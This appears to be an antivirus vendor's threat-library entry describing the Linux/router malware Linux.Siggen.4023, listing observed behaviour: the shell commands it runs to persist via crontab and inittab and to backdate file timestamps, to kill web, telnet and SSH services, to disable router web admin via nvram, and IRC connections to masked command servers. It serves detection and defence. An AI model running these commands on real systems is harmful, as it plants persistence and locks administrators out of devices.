Linux.Siggen.4023

Technical Information

To ensure autorun and distribution:

Creates or modifies the following files:

/var/spool/cron/crontabs/root
/etc/inittab
/etc/rc.local

Malicious functions:

Modifies router settings:

/bin/nvram

Stops system services:

service httpd stop
service telnetd stop
service sshd stop
systemctl stop httpd.service

Launches processes:

sh -c touch -acmr /bin/ls <SAMPLE_FULL_PATH>
touch -acmr /bin/ls <SAMPLE_FULL_PATH>
sh -c (crontab -l | grep -v \"<SAMPLE_FULL_PATH>\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1
crontab -l
grep -v <SAMPLE_FULL_PATH>
grep -v no cron
grep -v lesshts/run.sh
sh -c echo \"* * * * * <SAMPLE_FULL_PATH> > /dev/null 2>&1 &\" >> /var/run/.x00740882966
sh -c crontab /var/run/.x00740882966
crontab /var/run/.x00740882966
sh -c rm -rf /var/run/.x00740882966
rm -rf /var/run/.x00740882966
sh -c cat /etc/inittab | grep -v \"<SAMPLE_FULL_PATH>\" > /etc/inittab2
cat /etc/inittab
sh -c echo \"0:2345:respawn:<SAMPLE_FULL_PATH>\" >> /etc/inittab2
sh -c cat /etc/inittab2 > /etc/inittab
cat /etc/inittab2
sh -c rm -rf /etc/inittab2
rm -rf /etc/inittab2
sh -c touch -acmr /bin/ls /etc/inittab
touch -acmr /bin/ls /etc/inittab
sh -c /bin/uname -n
sh -c nvram get router_name
/bin/uname -n
sh -c kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &
sh -c service httpd stop > /dev/null 2>&1 &
cat /var/run/httpd.pid
sh -c killall -9 mini_httpd > /dev/null 2>&1 &
sh -c killall -9 minihttpd > /dev/null 2>&1 &
sh -c kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &
cat /var/run/thttpd.pid
sh -c nvram set httpd_enable=0 > /dev/null 2>&1
sh -c nvram set http_enable=0 > /dev/null 2>&1
sh -c killall -9 httpd > /dev/null 2>&1 &
sh -c service telnetd stop > /dev/null 2>&1 &
sh -c service sshd stop > /dev/null 2>&1 &
sh -c killall -9 telnetd > /dev/null 2>&1 &
sh -c killall -9 utelnetd > /dev/null 2>&1 &
sh -c killall -9 dropbear > /dev/null 2>&1 &
sh -c killall -9 sshd > /dev/null 2>&1 &
sh -c killall -9 lighttpd > /dev/null 2>&1 &

Attempts to kill system processes:

killall -9 mini_httpd
killall -9 minihttpd
killall -9 httpd
killall -9 telnetd
killall -9 utelnetd
killall -9 dropbear
killall -9 sshd

Kills system processes:

sshd

Attempts to kill the following processes:

killall -9 lighttpd

Performs operations with the file system:

Modifies file access rights:

/var/spool/cron/crontabs/tmp.WTlInc

Creates or modifies files:

/var/run/.x00740882966
/run/.x00740882966
/var/spool/cron/crontabs/tmp.WTlInc
/etc/inittab2

Deletes files:

/var/run/.x00740882966
/etc/inittab2

Network activity:

Awaits incoming connections on ports:

127.0.0.1:42076

Establishes connection:

21#.##3.199.94:8080
19#.##.172.42:8080

Connects to the following servers over the IRC protocol:

Server: 66.##8.182.1; Command: NICK A5|o|0|656713|unknown\nUSER x00 localhost localhost :1.0+tftp_s\n
Server: 66.##8.182.1; Command: MODE A5|o|0|656713|unknown -xi\n
Server: 66.##8.182.1; Command: MODE A5|o|0|656713|unknown +B\n
Server: 66.##8.182.1; Command: JOIN #0x00 :777\n

Technologies

Terminology

Training and education

Myths

Technical Information

Curing recommendations